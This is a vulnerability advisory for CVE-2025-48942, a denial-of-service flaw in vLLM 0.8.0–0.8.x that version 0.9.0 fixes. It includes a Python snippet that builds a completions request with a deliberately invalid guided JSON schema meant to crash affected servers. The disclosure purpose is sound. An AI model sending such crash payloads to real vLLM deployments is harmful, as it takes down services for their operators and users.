
CVSS: 6.5 (Medium)

CVE-2025-48942

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with an invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar to GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, which involves a regex instead of a JSON schema. Version 0.9.0 fixes the issue.
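As a hedged illustration of the failure mode described above, the sketch below builds the kind of OpenAI-compatible completions payload that could trigger the crash on affected versions (0.8.0 up to but excluding 0.9.0). The model name, prompt, and the specific malformed schema are assumptions for illustration only; the point is that "required" must be an array per JSON Schema, and an unpatched server did not reject the invalid schema gracefully (CWE-248, uncaught exception) before attempting guided decoding.

```python
import json

def build_guided_request(model: str, prompt: str) -> dict:
    """Hypothetical /v1/completions payload with an invalid guided JSON schema.

    NOTE: model name, prompt, and the malformed schema are illustrative
    assumptions, not taken from the advisory text.
    """
    return {
        "model": model,
        "prompt": prompt,
        "guided_json": {
            "type": "object",
            "properties": {"answer": {"type": "string"}},
            # Invalid: JSON Schema requires "required" to be an array of
            # strings, e.g. ["answer"]. On affected servers, schemas like
            # this were not rejected cleanly and could kill the server.
            "required": "answer",
        },
    }

payload = build_guided_request("example-model", "Say hi")
body = json.dumps(payload)  # the JSON body that would be POSTed to /v1/completions
```

On patched versions (0.9.0 and later), a request like this should come back as a client error rather than crashing the serving process.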
Vendor
Vllm
Product
Vllm
CWE
CWE-248 (Uncaught Exception)
Published
2025-05-30 19:15:30
Last Updated
2025-06-24 17:44:47
Source Identifier
security-advisories@github.com
KEV Date Added
-

Categories

References